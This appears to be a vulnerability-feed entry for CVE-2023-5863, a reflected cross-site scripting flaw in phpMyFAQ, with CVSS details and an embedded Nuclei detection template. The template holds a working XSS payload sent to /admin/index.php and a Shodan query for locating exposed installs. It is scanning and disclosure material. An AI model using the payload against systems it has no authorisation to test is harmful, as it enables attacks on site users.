phpMyFAQ < 3.2.0 - Cross-site Scripting

2024-08-1510:21:42

ProjectDiscovery

github.com

phpmyfaq

cross-site scripting

github

repository

3.2.0

3.2.2

huntr

cve-2023-5863

CVSS3

6.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

AI Score

5.9

Confidence

High

EPSS

0.001

Percentile

31.5%

JSON

Cross-site Scripting (XSS) Reflected in GitHub repository thorsten/phpmyfaq prior to 3.2.2.

id: CVE-2023-5863

info:
  name: phpMyFAQ < 3.2.0 - Cross-site Scripting
  author: ctflearner
  severity: medium
  description: |
    Cross-site Scripting (XSS) Reflected in GitHub repository thorsten/phpmyfaq prior to 3.2.2.
  reference:
    - https://huntr.com/bounties/fbfd4e84-61fb-4063-8f11-15877b8c1f6f
    - https://nvd.nist.gov/vuln/detail/CVE-2023-5863
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-5863
    cwe-id: CWE-79
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.html:"phpmyfaq"
    product: phpMyFAQ
  tags: cve2023,cve,huntr,phpmyfaq,xss

http:
  - raw:
      - |
        GET /admin/index.php?action=ngductung"><img+src/onerror="alert(document.domain) HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<img src/onerror="alert(document.domain)">'
          - 'phpMyFAQ'
        condition: and

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100a9bc553d3d653e7769a7f40593465aa247ade18c06dfb14f680caa8c94abc93c02206668b76ef43c5b333a65ce115675f5520544f7aeaad97d4d8cacc309c09c711d:922c64590222798bb761d5b6d8e72950